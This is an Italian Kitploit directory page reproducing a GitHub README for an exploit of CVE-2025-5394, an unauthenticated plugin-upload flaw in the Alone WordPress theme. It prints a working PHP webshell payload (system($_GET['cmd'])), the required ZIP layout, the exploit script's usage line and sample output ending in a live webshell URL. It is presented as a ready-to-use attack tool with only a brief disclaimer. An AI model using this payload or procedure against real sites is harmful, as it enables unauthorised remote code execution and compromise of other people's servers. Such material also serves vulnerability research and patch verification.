Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-5394 — Alone – Tema WordPress multiuso non-profit per beneficenza <= 7.8.3 - Mancanza di autorizzazione per il caricamento arbitrario di file non autenticato tramite installazione di plugin | Kitploit
Strumenti/GitHubGitHub/nxploited/cve-2025-5394
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHubnxploited/cve-2025-5394

CVE-2025-5394

Alone – Tema WordPress multiuso non-profit per beneficenza <= 7.8.3 - Mancanza di autorizzazione per il caricamento arbitrario di file non autenticato tramite installazione di plugin

Vedi Repository
311 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

🚨 CVE-2025-5394 - Upload Arbitrario di Plugin senza Autenticazione nel Tema Alone

📌 Prodotto interessato:

Alone – Tema WordPress Multipurpose Non-profit per Beneficenza
Versioni: <= 7.8.3
CVE: CVE-2025-5394
Punteggio CVSS: 9.8 (Critico)

🔥 Riepilogo della vulnerabilità:

Il tema Alone per WordPress è vulnerabile al caricamento arbitrario di file a causa di un controllo delle autorizzazioni mancante sulla funzione alone_import_pack_install_plugin().
Questa falla consente ad attaccanti non autenticati di caricare file ZIP (travestiti da plugin) da posizioni remote, ottenendo potenzialmente esecuzione di codice remoto.


⚙️ Script di exploit (Python)

Questo repository contiene uno script Python che automatizza lo sfruttamento di CVE-2025-5394.
Lo script attiva l'azione AJAX vulnerabile e carica un plugin falso (contenente una webshell) direttamente sul server WordPress.


📁 Requisiti della webshell:

Il file ZIP caricato deve seguire questa struttura:

root@kitploit:~
shell_plugin.zip
└── shell_plugin
    └── shell_plugin.php

Dove:

  • shell_plugin è la directory del plugin.
  • shell_plugin.php è un file di plugin PHP valido con un'intestazione di plugin.
  • Il file PHP può contenere un payload webshell.

Esempio di intestazione minima di plugin all'interno di shell_plugin.php:

root@kitploit:~
<?php
/*
Plugin Name: Webshell
*/
system($_GET['cmd']);
?>

🚀 Esempio di utilizzo:

root@kitploit:~
python3 CVE-2025-5394.py -help
root@kitploit:~
usage: CVE-2025-5394.py [-h] -u URL -s SHELL

CVE-2025-5394 Exploit | by Khaled Alenazi (Nxploited)

options:
  -h, --help         show this help message and exit
  -u, --url URL      Target WordPress site URL
  -s, --shell SHELL  ZIP file URL containing webshell (.zip)

✅ Output di successo:

root@kitploit:~
python3 CVE-2025-5394.py -u http://target.com/wordpress/ -s http://target.com/shell_plugin.zip
[>] Target        : http://target.com/wordpress
[>] Shell URL     : http://target.com/shell.php
[>] Plugin Slug   : shell_plugin
[>] Sending exploit...
[+] Exploit successful
[+] Webshell URL  : http://target.com/wordpress/wp-content/plugins/shell_plugin/shell_plugin.php

⚠️ Disclaimer:

Questo script è fornito esclusivamente per scopi educativi e di ricerca.
L'autore declina ogni responsabilità per qualsiasi uso improprio o attività illegale compiuti utilizzando questo codice.
Usalo solo su sistemi di tua proprietà o per cui hai esplicita autorizzazione a effettuare test.


👨‍💻 Autore:

Nxploited ( Khaled Alenazi )
GitHub: https://github.com/Nxploited

Scarica lo strumento